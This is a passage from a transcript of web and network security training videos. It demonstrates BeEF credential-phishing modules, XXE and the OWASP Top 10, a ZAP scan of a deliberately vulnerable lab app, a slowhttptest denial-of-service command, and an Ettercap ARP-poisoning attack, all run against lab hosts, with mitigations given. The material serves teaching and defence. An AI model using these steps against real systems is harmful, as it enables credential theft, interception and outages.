with the following text appears: 192.168.4.52.3000 says BeEF Raw Javascript. It includes a button labeled
"OK". [Video description ends]
Here's our raw JavaScript that was just executed on this hooked browser. So you can start to send messages to
unsuspecting victims so that you could trick them into doing something they otherwise wouldn't do. Now, we
wouldn't do this under normal circumstances. We would only do this in a test environment for the sole purpose
of learning how to mitigate or stop this type of activity.
[Video description begins] He clicks the "OK" button. [Video description ends]
Back here in the BeEF Control Panel, there's just so many things that could be done. If I expand Browser, let's
say, here, we could see Hooked Domain, and we could choose Get Cookie. We could execute that, and we
could start to see the results.
[Video description begins] He switches back to the BeEf Control Panel web page. He clicks the "Browser"
node in the Module Tree pane, which includes the "Hooked Domain" subnode, which further includes the "Get
Cookie" subnode. He clicks the "Get Cookie" subnode and its corresponding table opens in the "Module
Results History" pane and its corresponding page opens in the content pane. The table in the "Module Results
History" pane contains three columns and two rows. [Video description ends]
And it might take a moment before you start seeing results that are sent back here. You start to see cookie.
[Video description begins] He selects the first row in the table in the Module Results History pane and its
corresponding page opens in the content pane. [Video description ends]
Those cookies can contain sensitive token information for current web browser sessions on the user device. So
that is a concern. There are other things that we can do. So for example, let's see, what else can we do here?
We could close up Browser, maybe we'll go to Network. So many options.
[Video description begins] He selects the Network node in the Module Tree pane, which includes the ADC
subnode. [Video description ends]
Now, if we've got a green symbol, it means that BeEF has detected for sure that that will work, although you
just have to be patient. But just because something is red doesn't mean it won't work, it's just it's not been
detected that for sure it will from this interface. But again, doesn't mean it will work. So we've got a number of
good things that we can do here. For example, if I go down under Social Engineering, this is a good one, Fake
LastPass.
[Video description begins] He selects the Social Engineering node in the Module Tree pane, which includes
the Fake LastPass subnode. [Video description ends]
So LastPass, of course, is a password manager tool that is often used online that encrypts passwords. So we
can actually trick people to essentially sign into LastPass. So here's how this would work. We could choose
Fake LastPass, and then all we have to do is click Execute over here on the right.
[Video description begins] The corresponding table opens in the Module Results History pane and the
corresponding page opens in the content pane. The content pane includes a button labeled "Execute". He
clicks the "Execute" button and a new row entry gets added to the table in the "Module Results History"
pane. [Video description ends]
[Video description begins] He switches to the BeEF Basic Demo web page. A pop-up box labeled "Sign In"
opens. [Video description ends]
And if they're a LastPass user, they might think my session must have timed out, I'll just log back in again. So
I'm just going to put in some credentials here, and the user would click Login and hopefully they think
everything is okay. Back here, in BeEF, if I take a look at the result of sending that command to the hijacked
web browser, we can start to see that it looks like the username. Well, let's just scroll down to the bottom,
make our life easy. The username specified then for LastPass was user and the password was password. Scary
stuff.
[Video description begins] He switches back to the BeEF Control Panel web page. The second row entry is
selected in the table that is in the "Module Results History" pane. Its corresponding page is open in the
content pane. It includes several entries. [Video description ends]
We can even do other things such as maybe making it look like there's a Facebook notification timeout or
something like that. All of these things are possible here. For example, I'm still under Social Engineering. If I
choose Pretty Theft on the left, I'm not going to change any of the default items here, but notice it's going to
use a Facebook dialog box, but it could be YouTube, Yammer, it could be LinkedIn, it could be anything.
[Video description begins] He selects the "Pretty Theft" subnode under the Social Engineering node. Its
corresponding table opens in the "Module Results History" pane and its corresponding page opens in the
content pane. The content pane includes a drop-down list box labeled "Dialog Type". The "Facebook" option
is selected in the drop-down list box. The content pane also includes a button labeled "Execute". [Video
description ends]
If I leave it on Facebook and simply just click Execute, this is what the user sees. And if indeed, they are a
Facebook user, it looks like their Facebook session timed out. And again, we could specify some details here,
the user might say, I better sign back in again.
[Video description begins] He switches back to the BeEF Basic Demo web page. A pop-up box called
"Facebook Session Timed Out" appears. [Video description ends]
And they'll click Log in. Of course, this is now all available to the malicious user. So if we look at the
command output for that, we can see the username or the e-mail address and the password that was sent.
[Video description begins] He switches back to the BeEF Control Panel web page. A new row entry gets
added to the table in the "Module Results History" pane and its corresponding page is open in the content
pane. An entry is added to the page. [Video description ends]
So this can be a little bit scary. Now, interestingly, if I go all the way back up, let's see, to Network, we even
have the option here of detecting social networks. There it is. And so, again, you have to be patient.
[Video description begins] He selects the "Detect Social Networks" subnode under the "ADC" subnode in the
Module Tree pane. Its corresponding table opens in the "Module Results History" pane and its corresponding
page opens in the content pane. The content pane includes a button labeled "Execute". The table includes
three columns and one row. A new row entry gets added to the table in the "Module Results History" pane and
its corresponding page opens in the content pane. [Video description ends]
So I'll execute that, and when I go look at the result of the command and come back after a minute, we're going
to start to see that the user, well, let's take a look at an older command result. Gmail, the user's not
authenticated to Gmail, Twitter. User is authenticated to Twitter.
[Video description begins] He selects the first row entry in the table and its corresponding page opens in the
content pane. He points to an entry in the content pane that states information related to the user
authentication. [Video description ends]
Well, that's a timeout in Facebook, the user is authenticated to Facebook. So that might trigger the malicious
user to start trying to trick users with Facebook dialog boxes. Now, in this particular example, we started this
whole thing from getting started by essentially pulling up a page that was infected. And so, if that page is
stored on a server, then that would be an example of a persistent or a stored XSS or cross-site scripting attack.
describe how the use of insecure XML components can lead to web application compromise
[Video description begins] Topic title: XML Attacks. The presenter is Dan Lachance. [Video description ends]
XML stands for Extensible Markup Language. This uses tags in a text file to describe data.
[Video description begins] XML External Entities (XXE). [Video description ends]
Whereas HTML is the language used by website developers to describe formatting attributes. Well, that's true.
XML doesn't describe formatting. It describes data. So it's a common data exchange format for dissimilar
systems to exchange data over a network. Now here's an example of some XML. We're describing a data entity
called customer. And it's broken down into individual components or fields, lname for last name, fname for
first name, and then the e-mail address of a particular user. So that's what XML might be structured as. Now
the problem becomes, first of all, that we are transmitting open text over the network.
Well, depending on what kind of connection has been established determines if that's true or not. So if you've
got an HTTPS connection using TLS version 1.2 or higher, then it's okay to transmit this data over that
connection. Because it's encrypted such as it would be through a VPN tunnel. But what becomes a problem is
when you are using extra components in your web application. Software developers these days, when they're
building a web app, probably aren't building everything from scratch. They're going to call upon existing code
libraries that already had to do a lot of the hard work, or they're going to use extra components that give their
apps extra capabilities. And one of those components would be an XML parser within the web application. So
this is a web app component that would have the ability to read XML and process it in some way, such as
maybe to filter it or transform it to another format. So it can be stored in a back-end database.
So the idea here is that we could have a malicious piece of code or a malicious user that's injecting malicious
content. Now this would be something that could be done while the XML parser is processing the app. So if
the XML parser component is older, then it might be vulnerable to this, although often, there are patches
available to prevent this from happening. But of course, not everyone patches everything when they should. So
this is called an XML external entity or XXE type of issue. So what kind of threats result from this? It could be
a denial-of-service attack. Crashing an application is considered denial-of-service. We are denying legitimate
access to that service or to that app. Depending on how the code is using the XML parser could also result in
remote command execution or the disclosure of sensitive data.
So for example, imagine that we've got an XML parser that's running server side on a web server and an
attacker manages to inject some code there. That maybe that's because they've gained remote access to the web
server. Or because they've got the ability to pass data into a component in the app that's going to be used by the
XML parser. And let's say that they're specifying an XML entity where they are telling it to go to the file
system and read slash etc slash password. Now, this is the username file on a Unix or Linux system, at least
most Unix and Linux systems. And so that could be data that gets returned to the malicious user. And we all
know that if malicious users have a valid list of usernames, that's one less thing they have to figure out as part
of their reconnaissance.
After completing this video, you will be able to list common web application vulnerabilities.
Objectives
[Video description begins] Topic title: OWASP Top 10. The presenter is Dan Lachance. [Video description
ends]
Running or creating web applications means having a solid understanding of web application security flaws.
[Video description begins] Web Application Security Flaws. [Video description ends]
Now, this is going to be crucial to prevent any attacks from occurring against the web app or through the web
app. So we have to think about security flaws that could exist at the underlying architectural level. So at the
hardware level due to unpatched firmware, such as unpatched firmware on a wireless router that could allow
access to a network and then, in turn, gaining access to a network could lead to the compromise of a web app
on that network. Or the lack of using PKI to secure connections such as with HTTPS. The lack of
authenticating users to a network, in other words, allowing anyone to connect to a network in the first place.
There's also poor coding practices, so the lack of proper input validation is a big problem. Any input supplied
by users needs to be really treated as hostile and untrusted when it comes to writing code. And so it needs to be
checked thoroughly to make sure that malicious code isn't being injected to the app. No encryption of data in
transit is a problem, or no encryption of data at rest. And this is where the Open Web Application Security
Project, or OWASP Top 10 kicks in. OWASP is a non-profit organization, the overall goal is to secure web
apps. And OWASP periodically publishes the top 10 web application vulnerabilities.
The first of which is injection type of attacks, where attackers feed malicious input into a web app, whether
through XML or serialized objects. A serialized versus a deserialized object occurs when you send object
information at the programming level over a network. It's usually deserialized, so it's treated as text as it's
being sent over a network, and then it gets put back together into an object or serialized on the other end. Then
there's database queries, you might inject some commands that might retrieve data that otherwise shouldn't
have been disclosed, or maybe to destroy an underlying database table.
The next or second item in the OWASP Top 10 is broken authentication, such as weak password settings
related to password length, or password expiration, or the reuse of known passwords. Or even the lack of using
multi-factor authentication to harden user sign-in security by requiring things like beyond just a username and
password, which are something you know, including something like a smart card, something you have. Or a
username and a password and a PIN sent through SMS text messaging to a smartphone. The third OWASP
Top 10 major vulnerability is sensitive data exposure, which could occur in many different ways.
It could be due to cryptographic keys that get compromised. So an attacker being able to compromise a user
station that stores, let's say, private keys. The private key, of course, is used for things like decryption or for
creating digital signatures. User accounts might be compromised. Shoulder surfing is actually an issue.
Someone in the office actually walking by and lingering to see what you're typing in. Or clear text data being
transmitted over the network and being captured. And then clear text data can also be stored on disk, so it
could be a problem with not encrypting data at rest.
[Video description begins] Clear text data is retrieved by packet sniffing as well. [Video description ends]
The fourth OWASP Top 10 security issue relates to XML external entities, otherwise called XXE.
[Video description begins] A4: XML External Entities (XXE). [Video description ends]
Here we have an example of XML data. XML is just really a way to express data stored in a text file. And so if
we're using an XML parser component in a web app that's vulnerable, it could allow malicious users to inject
content. And that could, for example, allow the malicious user to request specific information from the server
hosting the XML parser.
The fifth OWASP Top 10 security vulnerability is broken access control, where authentication leads to
authorization. Authorization, of course, means access to a resource, such as files on a file server. And, for
example, if we're not adhering to the principle of least privilege, we might allow extra access or administrative
access to file systems when that's not even required for a user to do their job. So that would be an example of
broken access control, and that would come to light through security audits.
OWASP Top 10 item A6 is security misconfiguration, such as using default items like usernames or
passwords, which is notorious with IoT devices. So default configuration settings, such as leaving the standard
web server installation path or web server root. Or not configuring TLS, Transport Layer Security version 1.2
or higher to secure connections, such as with HTTPS on a web site. Or having an open Wi-Fi network that
doesn't require any authentication at all. Or leaving unused user accounts active. Or leaving services that are
enabled by default running when they aren't even used.
OWASP Top 10 item A8, insecure deserialization. Modern day programming is object oriented. Object-
oriented programming or OOP, O-O-P, allows you to work with items or objects which have properties and
methods. Now, when you transmit objects between hosts, essentially you are deserializing it into standard text
and maybe storing it in a file. It allows for object portability. So deserialization, the object gets converted to a
byte stream for transmission over a network which is just simple text. And at that point, malicious code
potentially could be injected before the object is deserialized completely. And then serialized on the other end
of the connection back into an object.
[Video description begins] A9 : Using Components with Known Vulnerabilities. [Video description ends]
Item A9, using components with known vulnerabilities. Web app developers don't write everything from
scratch these days, at least not normally. They use existing libraries and components for the web app to give it
functionality. So having a lack of detailed knowledge about the component, how it's written, how it works, any
potential vulnerabilities and not putting patches on them is a problem. So if you're not updating those
components, your app could be vulnerable.
[Video description begins] A10 : Insufficient Logging and Monitoring. [Video description ends]
Finally, OWASP Top 10 item 10 is insufficient logging and monitoring. Think about the time that might be
required to detect security issues. We don't want a long time to go by before they're detected. We don't want a
delayed incident response. Now, the scary fact is if we look back in time at known logged security incidents, in
2016, the average time to detect a security event was 191 days. How much damage could a malicious user do
within that time? So continuous monitoring is important to detect suspicious activity. You can only do that if
you have the correct configuration based on what's normal in your environment. If a baseline of normalcy is
established, you can configure rules for intrusion detection to alert you when abnormal events occur. So that's
going to be an important way to detect suspicious activity.
[Video description begins] Topic title: Testing Web Application Security. The presenter is Dan
Lachance. [Video description ends]
Managing risks is an important part of a cybersecurity analyst job description. And part of that is determining
any vulnerabilities on a web application that need to be addressed. Now, there are plenty of sample test web
applications that are poorly coded that you can test this against to hone your skills, one of which is called
Badstore.
[Video description begins] The Badstore: 1.2.3~VulnHub web page is open. [Video description ends]
We can download this and run a virtual machine from it, and then run our web application scanner tools
against it. That's exactly what we're going to do here. Now, I've already got this running. I have the IP address
seen here.
[Video description begins] The following IP address is open in the browser: 192.168.157.131. The
BADSTORE.NET web site is open. It is divided into two parts: navigation pane and content pane. [Video
description ends]
And we can see we're at the BadStore.net sample web application. And I can manually go through all of the
links and test all of the functionality manually. But that's where web application vulnerability scanners kick in.
They make it quicker and easier, they're automated, tools like Burp Suite or OWASP ZAP, the Zed Attack
Proxy, which we're going to run here. Now I've got the OWASP ZAP tool installed and running here on my
Windows 10 station. But if you have other tools like Kali Linux, then OWASP ZAP is already built into that.
[Video description begins] The OWASP ZAP 2.9.0 window opens and the following pop-up box opens: Do you
want to persist the ZAP Session. It includes a button labeled "Start". [Video description ends]
So I don't want to persist any of my session settings, so I'll leave it on no, and I'll click Start.
[Video description begins] The OWASP ZAP 2.9.0 window is divided into four parts. The first part contains a
menu bar and a tool bar. The second part is a Sites pane. The third part is a content pane. The fourth part
includes several tabs including History and Alerts. The tool bar includes a drop-down list box with four
options: Safe Mode, Protected Mode, Standard Mode, and ATTACK Mode. [Video description ends]
Now in the upper-left, if I want to actually perform a penetration test, then I could choose ATTACK Mode,
which could potentially cause a problem with the web application. Now, we never want to use any of these
tools against a real system that we don't have express written permission to be performing this type of attack
against. It could land you in trouble, so use these tools properly. However, in this context, it's an application
under my control.
[Video description begins] A new tab labeled "Active Scan" opens in the fourth part of the window. [Video
description ends]
For testing purposes, I'm going to go into ATTACK Mode, and I'm going to click Automated Scan.
[Video description begins] The Quick Start page is open in the content pane. It includes a button labeled
"Automated Scan". He clicks the "Automated Scan" button and its corresponding page opens in the content
pane. It includes a text box labeled "URL to attack", a drop-down list box labeled "Use ajax spider", and a
button labeled "Attack". [Video description ends]
What I want to do here is specify the URL of the web application. So here's the IP address of my BadStore
sample web app. And I'm going to tell it that we're going to use the Chrome browser capabilities, essentially to
crawl through and check everything on the site. Then I'll click Attack.
[Video description begins] He types the following text in the "URL to attack" text box: http://192.168.157.131.
He selects the "Chrome" option in the "Use ajax spider" drop-down list box. He then clicks the "Attack"
button. A tab labeled "Spider" opens in the fourth part of the window. [Video description ends]
Now we can see down below there are a number of HTTP POST and get methods that are being tested against
a lot of the aspects of the application that are available. Here we can see in the CGI script, we've got a lot of
different things that are being tested. We can also see the overall percentage of the entire scan. So I'm going to
give it a few minutes before we go and take a look at any alerts which will tell us that we've got some
vulnerabilities in our web application. Okay, so now that the scan is completed, if we go to the Alerts tab, we
have some issues here, Cross Site Scripting specifically Reflected. XXS type of attack apparently is possible.
[Video description begins] The "Alerts" tab is divided into two sections: navigation pane and content pane.
The navigation pane includes an Alerts root node, which further includes a Cross Site Scripting (Reflected)
subnode, which further includes a file called: POST: http://192.168.157.131/cgi-bin/badstore.cgi?
action=moduser. He clicks the aforementioned file and it opens in the content pane of the Alerts tab. [Video
description ends]
So if we click, we can see that an HTTP POST was supplied to the application. We can see it was a CGI script.
We can also see the action here is to mod user, to modify user. Okay, so that must be the functionality in that
web application to change something about a user account. And over on the right, we can see that that is a
High Risk.
[Video description begins] He points to the contents of the aforementioned file. [Video description ends]
As we go further down, we can see actually the attack that looks like it might have been sent, which was some
JavaScript that was placed inside a location that otherwise shouldn't have allowed that to happen. And we can
see a solution listing here to use better code libraries, maybe to properly encode output using Microsoft's anti
cross-site scripting library or the OWASP ESAPI. That's the enterprise security API. So there are some
solutions that are recommended here. There are some SQL injection issues. If we take a look here, we can even
see how this attack was actually sent and that results were sent back.
[Video description begins] The Alerts root node also includes a SQL Injection subnode, which further includes
a file called: POST: http://192.168.157.131/cgi-bin/badstore.cgi?action=cartadd. He clicks the
aforementioned file and it opens in the content pane of the Alerts tab. He then points to the contents of the
aforementioned file. [Video description ends]
So essentially 1=1 is always true, and if not properly validated, that could allow the disclosure of sensitive
information from the web app. So again, as we go down, we can see that there are some solutions listed here
with reference points as well. If we scroll down, we have a lot of other issues. For example, let's go into
Directory Browsing. So it looks like, let's see here, there's a listing here for a supplier subdirectory on the web
site. So directory browsing is enabled or allowed there.
[Video description begins] The Alerts root node also includes a "Directory Browsing" subnode, which further
includes a file called: POST: http://192.168.157.131/supplier/. He clicks the aforementioned file and it opens
in the content pane of the Alerts tab. He then points to the contents of the aforementioned file. [Video
description ends]
Let's actually check that out for a second. So yeah, sure enough, if I enter in /supplier/ after the IP address on
that web app, I get a listing.
[Video description begins] He switches to a browser window and opens the following URL:
192.168.157.131/supplier/. The following web page opens: Index of /supplier. It includes a table with four
columns and two rows. The column headers include "Name" and "Last modified". The second row entry
includes: Name: accounts. [Video description ends]
And I can see here we've got accounts. And if I click that, this is probably something that not anybody should
just be able to see without signing in to that web application. So yes, it looks like there are a lot of
vulnerabilities in this web app.
[Video description begins] The following web page opens: 192.168.157.131/supplier/accounts. [Video
description ends]
So as a cybersecurity analyst, we have to make sure that this was conveyed to the appropriate teams such as a
developer team manager. And when doing that, we might want to go to the Report menu here in the OWASP
ZAP tool and generate a HTML report here. So let's just go ahead and specify one here, call it BadApp and
we'll just save it.
[Video description begins] He switches back to the OWASP ZAP 2.9.0 window. He clicks "Report" in the menu
bar and clicks the "Generate HTML Report" option from the menu. A dialog box called "Save" opens. [Video
description ends]
And that generates an HTML report here. Where we can see a summary at the top of the risks and then a
breakdown of the specific risks and exactly what was tested against the application.
[Video description begins] The following html page opens in the browser: ZAP Scanning Report. [Video
description ends]
So this might be something that we want to hand off to the team leader for the developers and get them to start
taking a look at how to solidify this web application.
use the slowhttptest command to run a DoS attack against an HTTP web site
[Video description begins] Topic title: DoS Attacks. The presenter is Dan Lachance . [Video description ends]
A denial-of-service attack or D-O-S-, DoS attack, is one that renders a service unavailable.
[Video description begins] The Badstore.NET website is open. [Video description ends]
So in the case of a web application here, we can see if I keep clicking the Refresh button, it's loading up and
the page is good, the web app is running. But a denial-of-service attack would not allow people to make a
connection, in this case to a web application, but it could be any type of service. Now maybe the malicious
user floods the network with useless traffic, so legitimate traffic doesn't get a chance to get through. Perhaps a
malicious user sends specifically crafted traffic to the server that causes it to crash by taking advantage of a
vulnerability. Or if you have physical access to a server, you could always unplug the network cable, that
would also be considered a denial-of-service attack. Here on my Linux host, I'm going to start by making sure
I've got a tool that will allow me to test essentially by sending a bunch of incomplete HTTP requests. It will
allow me to test a service resiliency to this type of denial-of-service attack.
[Video description begins] He opens the following window: dlachance@kali:~. The following prompt is
displayed: dlachance@kali:~$. [Video description ends]
So I'm going to run the sudo Linux prefix command, to run something in elevated privilege mode. And what I
want to do is run apt-get install and the tool I'm interested in is a free one called slowhttptest. So it's slow
enough where it won't trigger off a lot of intrusion detection systems because of abnormal traffic spikes. But at
the same time we can also control the rate that we are sending incomplete HTTP requests to the web app to test
its resiliency. So I'm going to go ahead and press Enter.
[Video description begins] He executes the following command: sudo apt-get install slowhttptest. The screen
prompts for the password for dlachance. [Video description ends]
It wants my password, so I'm going to go ahead and enter that and it looks like it's already updated to the
newest version. There are no updates so we have the tool, we are good to go.
[Video description begins] He enters the password and the output displays that slowhttptest is already the
newest version. The prompt does not change. [Video description ends]
So what I have to do then is use the command with the appropriate command line parameters.
[Video description begins] He executes the clear command. [Video description ends]
So I'm going to run slowhttptest -c. This is the number of connections. How about we start off with 500
connections and -g. A lowercase -g means to generate a CSV and HTML file report. And I'm then going to
specify that I want to issue a type of command, an http get command. And let's just take a look here, I'm going
to use -u, the u is for the URL. So I've pasted in the URL to that web app and then a -H to send unfinished
HTTP requests to the server. Let's go ahead and press Enter to see what happens at the same time currently, we
can see that the service is available. The web app itself is available. At some point if the server is susceptible to
this type of attack, we can already see it just changed, service available currently says, NO.
[Video description begins] He executes the following command: slowhttptest -c 500 -g -t GET -u
http://192.168.157.131/ -H. The output displays that the service is not available. He switches back to the
Badstore.NET website. [Video description ends]
Back here in my web browser, I've refreshed the page, we can see it's trying to refresh but it's just not loading
it up. So a legitimate user, such as myself, for example, is unable to make a connection, hence denial-of-
service. Now naturally, if you're testing this type of a tool, you want to make sure you do not test it against a
real site that you don't have expressed permission to run this type of test. Otherwise you could be getting
yourselves into a pot of hot water. You can get into a lot of trouble by doing this. And back here in Linux, we
can see that the site is still unavailable.
[Video description begins] He switches back to the following window: dlachance@kali:~. He points to the
output. [Video description ends]
So what can you do about this? Well, one of the things you should consider doing to mitigate this type of slow
HTTP denial-of-service attack is to set connection timeouts on the server. But that is a very fine-tuned
balancing act because you don't want to set the connection timeout such that it will cause problems for
legitimate users. You might also want to make sure you configure header limits HTTP header limits on your
web server stack, so that the server will only accept very specific types of HTTP header details that are needed
by your application. But the problem is that there will always be a trade-off between limiting slow HTTP
attack effectiveness, and then also a trade-off against affecting legitimate users that are connected. Of course
you can always mitigate this with intrusion, detection and prevention systems, IDSs and IPSs that are
configured to identify anomalies with HTTP requests, such as numerous different types of requests that are not
complete coming from the same IP address. Now on that Linux host in the GUI, I've navigated to my current
home directory where the HTML report has been saved.
[Video description begins] He switches to the following html page in a browser: /home/dlachance/slow_2020-
03-02_09-58-18.html. It includes a graph labeled: Test results against http://192.168.157.131/. He points to
the aforementioned graph. [Video description ends]
So here we can see service availability is listed here in green. In the beginning of the test, the service was
available. But as our denial-of-service attack progressed, we could see that the service availability diminished
to nothing so that real legitimate requests were no longer able to reach the web application.
After completing this video, you will be able to describe ARP poisoning attacks.
Objectives
[Video description begins] Topic title: ARP Poisoning. The presenter is Dan Lachance . [Video description
ends]
The Address Resolution Protocol, otherwise called ARP, maps to layer 2 of the OSI model of the data link
layer.
[Video description begins] ARP Functionality. A diagram is displayed. [Video description ends]
The way that ARP works is that it is used for machines running TCP/IP to learn of the MAC address of
another host on a local area network. So they can communicate using that MAC address on the LAN.
Ultimately, of course at the software level, the IP address is what is used to make the communication link, but
under that, it's the MAC address. So in our diagram, we've got a machine configured with a default gateway on
the left of 192.168.4.1. Now that's an IPv4 address. In order for that computer to actually communicate with
the machine with that IP address, the computer needs to know the underlying hardware address of that device,
the MAC address. And so we can see that the machine will then send out a broadcast that essentially says, who
is configured with an IP of 192.168.4.1? I need your MAC address. That's a local area network broadcast.
Now the router on the network that is configured with that IP, 192.168.4.1, is going to see the broadcast. And
it's going to reply with its hardware MAC address, which we see here is listed as beginning with 18 and ending
with 32. That in turn will be written into the ARP cache in memory on the machine, the computer that initially
sent out the ARP request. So there will be a mapping then between the IP address and the related hardware
address. Now this is only on a local area network. When you need to communicate with the machine outside of
your local area network on the other side of the router, you don't look for its MAC address. You would only be
interested in the MAC address until you get to it, which would be your router's MAC address for the interface
on your side of the network. So this all happens then only on a local area network.
[Video description begins] ARP Cache Poisoning (MiTM attack). A diagram is displayed. [Video description
ends]
Now, ARP cache poisoning, this is a type of man in the middle, or MiTM attack. On the left, we've got the
victim station, and on the far right, we've got an actual router that the victim would use to, for example, get out
to the Internet. And that router in this example has an IP address of 192.168.4.1. And it's got a MAC address
beginning with 18 and ending with 32. So ideally under normal legitimate circumstances, the ARP cache on
the victim station should map the router's IP address to its MAC address. But where ARP cache poisoning
kicks in, is a malicious user somehow gains access to the network, their device can be on the network. That's
the attacker station pictured in the center of our diagram. Now, let's say it's got a MAC address beginning with
00 and ending with ED. It's a hexadecimal 48-bit address. And let's say that they've got IP forwarding enabled,
the attacker station. So what happens with an ARP cache poisoning attack is that the attacker will tell the
victim station that the MAC address for the router entry in its ARP cache is the MAC address of the attacker
station. Now, what does this mean? It means that when the victim wants to go out on the Internet through the
router, the traffic is first going to go through the attacker station. So the attacker station sees all of this traffic
that it normally wouldn't. And the attacker could run tools like Wireshark, or whatever the case might be, to
analyze that traffic.
[Video description begins] ARP Cache Poisoning: Mitigation. [Video description ends]
So what can be done about this? How can we mitigate ARP cache poisoning? The first is using intrusion
detection systems and intrusion prevention systems to detect rogue devices that perhaps should not be on the
network and of course, limiting network access in the first place using network access control.
[Video description begins] Intrusion Detection Systems abbreviates to IDS. Intrusion Prevention Systems
abbreviates to IPS. [Video description ends]
So being very strict about who can make a connection to the network, whether it's wired or wireless, in the first
place.
[Video description begins] Limit network access abbreviates to NAC. [Video description ends]
Now, there's also the option of using the Get-NetIPInterface PowerShell cmdlet and then taking note of the
index number of a network interface.
[Video description begins] ARP Cache Poisoning: PowerShell Mitigation. A code snippet is displayed. The
code reads, code starts: Get-NetIPInterface New-NetNeighbor -Interfaceindex <value> -IPaddress
<router/server IP> -LinkLayerAddress <router/server MAC>. Code ends. [Video description ends]
And then using the New-NetNeighbor PowerShell cmdlet, specifying that interface index with an IP address
and a link layer address. Now that's the MAC address. What we're doing here is we're adding a static ARP
cache entry. Normally, app cache entries are dynamic.
[Video description begins] ARP -a. A code snippet of the output of the ARP -a command is displayed. The
output displays a table containing a list of internet addresses, their physical address, and their type. [Video
description ends]
However, once you've run those commands, if you were to run ARP -a from a regular Windows command
prompt, you would see, for example, as in our case, the IP address of the default gateway, the true physical
hardware or MAC address of the default gateway and the type would be static. Now, if you don't manually add
this entry to the ARP cache, it will show up here as a dynamic, and it's learned dynamically over the network.
And that's one of the problems that leads to ARP cache poisoning.
In this video, learn how to use Kali Linux to execute an ARP poisoning man-in-the-middle attack.
Objectives
ARP stands for Address Resolution Protocol. This is used on a local area network, so devices can resolve an IP
address that they're trying to communicate with on the LAN to its underlying hardware address, otherwise
called the physical address or the MAC address. Problem is that there are ways that we can poison the cache of
a device. So that the IP address of a machine it wants to talk to, it's still left the same but the MAC address is
spoofed to be the attacker station. That way all the traffic goes through the attacker's station. So the attacker
can then examine all the traffic and so on.
[Video description begins] The command prompt window is open. The following prompt is displayed: C:\
>. [Video description ends]
So here on Windows 10, let's run arp -a and I'll pipe that to more to stop after the first screen fold.
[Video description begins] He executes the following command: arp -a | more. The output displays the ARP
cache tables for all interfaces. The prompt does not change. [Video description ends]
So for my network interface adapter with an index value of two, I can see I've got the IP address of my default
gateway or my router. Here it's listed as 192.168.4.1. And through address resolution protocol or ARP, my
machine knows the physical hardware address of the router which it needs to communicate with it on the local
area network. Okay, so far so good, we're happy with that. I'll press Q to quit and let's flip over to Linux. Here
in Kali Linux, I'm going to use the cat command to go into /proc/sys/net/ipv4.
[Video description begins] He switches to the following window: dlachance@kali:~. The following prompt is
displayed: dlachance@kali:~$. [Video description ends]
Now what I'm interested in looking at is the ip_forward file. It contains a value of 1 which means IP
forwarding or routing is turned on.
[Video description begins] He executes the following command: cat /proc/sys/net/ipv4/ip_forward. The prompt
does not change and the output reads: 1. [Video description ends]
If it weren't, it would be set to 0. And I would have to go ahead and make a change to that using a text editor
and then restart the network services. Now at this point, what this means is that any traffic that I might
intercept through a man in the middle or MITM type of attack through ARP cache poisoning. Any traffic that I
get on this machine from let's say the Windows 10 client will be sent out to the internet through the router
because I'm routing and vice versa.
[Video description begins] He executes the following command: sudo ifconfig. The output displays the network
interfaces of the system. The prompt does not change. [Video description ends]
So at this point, what I'm going to do is just run a sudo space ifconfig so we can check out the IP of this host,
192.168.4.52, and its Ethernet or hardware address. Notice it ends with 10:ed.
[Video description begins] He points to the following ethernet address in the output:
00:0c:29:d4:10:ed. [Video description ends]
Okay, having done that, I'm going to run ettercap -G, I'll have to put a sudo in front of that.
[Video description begins] He executes the following command: sudo ettercap -G. The Ettercap window
opens. It includes a Setup section, a button with three dots, a "Hosts List" button, and a tick icon. He clicks the
tick icon. [Video description ends]
And here, it started the Ettercap interface. Now, this tool is simply a tool that will let me scan the network for
hosts and select the ones I want to attack and then initiate an attack like an ARP poisoning attack. So I'm okay
with all the default settings here. So I'm just going to click the check mark and it says it's starting it up. Now
I'm going to click the three dots button over on the right, going to choose Hosts and Scan for hosts. I want it to
scan for hosts on the local area network that this Kali Linux station is connected to. Now once that happens,
we'll be able to select the machines that we want to attack from our poisoning. In this case, it's going to be a
Windows 10 client and our router. So I can click this button in the upper-left to reveal the hosts it detected on
the network.
[Video description begins] He clicks the "Hosts List" button and a Host List tab opens. It includes a table with
three columns and several rows. The column headers are: IP address, MAC address, and Description. [Video
description ends]
I can see one of them here is my default gateway and there's the MAC address of it.
[Video description begins] He points to the first row entry which includes: IP Address: 192.168.4.1 and MAC
Address: 18:90:88:A0:36:32. [Video description ends]
Now the other one we have to determine what the IP address and MAC address are for our Windows 10
station. So back here in Windows 10. Let's just clear the screen and do an ipconfig.
[Video description begins] He executes the cls command. The prompt does not change. He executes the
following command: ipconfig. The output displays the system details including the ip address. The prompt
does not change. [Video description ends]
And I can see for my WiFi adapter, 192.168.4.24 is the IP for that Windows 10 host.
[Video description begins] He switches back to the Ettercap window. [Video description ends]
Okay, so I now know the identity of the default gateway and the Windows 10 station. These are the two
devices that I want to add as targets here for ARP spoofing.
[Video description begins] He points to the first row entry. He then points to the sixth row entry which
includes: IP Address: 192.168.4.24 and MAC Address: 18:56:80:C3:68:BA. [Video description ends]
So I'm going to select the first one, let's say our default gateway. And I'm going to go ahead and click the
Ettercap Menu, the three dots, going to choose Targets. And I'm going to select the targets. Now here I could
specify the details in this interface to specify the targets or I have the option also of just right-clicking in the
list of discovered hosts.
[Video description begins] The following pop-up box opens: Enter Targets. He then closes the pop-up
box. [Video description ends]
So I'm going to right-click on the first one, say Add to Target 1, and says down below, it's added it to target 1.
Then we've got .24, that's the Windows 10 host. So I'm going to right-click, add that to target 2. Okay, well
that's pretty easy. Now, we have to start the attack. So I can click the globe icon at the top and notice that there
are different types of attacks available here in Ettercap. Now, as always, you want to make sure that you're
doing this only against hosts that you own or that you have expressed, written permission to perform the attack
against. I'm simply going to choose ARP poisoning, looks good.
[Video description begins] The following pop-up box opens: MITM Attack: ARP Poisoning. It includes a
button labeled "OK". [Video description ends]
Okay, and it's on its way, it's ARP Poisoning the victims. Let's see what that actually looks like.
[Video description begins] He switches to the command prompt window. The following prompt is displayed:
C:\>. [Video description ends]
So here in Windows 10, if I were to run arp -a again to display the arp cache, pipe it to more.
[Video description begins] He executes the following command: arp -a | more. The output displays the ARP
cache tables for all interfaces. The prompt does not change. [Video description ends]
We can see the IP address of our default gateway 192.168.4.1. But what's changed is the MAC address. This is
